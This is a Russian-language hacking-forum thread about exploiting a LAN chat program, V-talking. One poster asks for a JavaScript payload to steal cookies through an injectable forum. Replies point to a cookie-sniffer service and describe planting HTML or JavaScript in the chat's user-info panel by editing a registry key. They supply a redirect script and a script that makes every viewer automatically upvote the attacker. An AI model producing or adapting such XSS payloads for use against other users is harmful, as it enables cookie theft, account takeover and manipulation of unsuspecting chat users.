V-talking / просьба
 

Вот в сетке перешли на новый чат - V-talking - несерверный и емеет форум, естессно дырявый =) короче есть возможность подставления произвольного скрипта в тело форума через сообщение вот тока что-то на ум не приходит какой бы забабашить скрипт туда чтоб он что-нить потырил ... может быть куки все или еще что ... был бы очень признателен за скриптик)

сниффер
http://old.antichat.ru/sniff/

да знаю про сниффер просто а яваскриптом плоховато) сам скриптик бы не помешал вот тока куки отошлются чатовые если обычные ХСС брать а мне нужно какие нить полезные )

там ест ьеще одна дырка.
уязвимость находица в инфе. там показывается инфа о компе и т.д. сведения о процессоре берутся из реестра. это очень хорошо) находим этот ключ. для ленивых вот он:
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\Cen tralProcessor\0]
"ProcessorNameString"="Intel(R) Pentium(R) 4 (4 CPU) Kra6 Edition "
"~MHz"=dword:00000fa1

1 - название проца
2 - частота

незабываем сделать бэкап. и изменяем ех на свои надписи. можно с поможью этого вставлять html теги, ява скрипты) вот ява скрипт переадресации на другую страницу, думаю он тебе пригодится:

<SCRIPT LANGUAGE="javascript">window.location.href = "http://xxx.ru"</SCRIPT>

можно сделать чтоб инфу не посмотрели, потделать инфу. а если например так написать:
<SCRIPT LANGUAGE="javascript">window.location.href = "~a192.168.100.110"</SCRIPT>

то все кто смотрят твою инфу автоматом ставят тебе +